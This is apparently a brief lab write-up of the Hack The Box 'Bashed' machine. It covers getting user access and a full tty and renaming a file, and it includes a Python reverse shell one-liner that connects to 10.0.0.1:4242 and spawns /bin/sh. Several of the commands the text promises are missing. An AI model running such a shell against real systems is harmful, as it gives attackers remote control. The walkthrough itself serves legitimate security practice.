Bashed HTB
We navigate to the above mentioned directory and find a bash terminal with user privileges where we can collect our flag from user.txt
We notice that we do not have full tty so we execute the following to gain full tty:
After we gain full tty we find the linux version and other details using:
Now we can rename it from php to unnamed
mv hax.php hax
and make it executablechmod +x hax
Using this cheatsheat https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#perl we make a test.py file with:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])
Last updated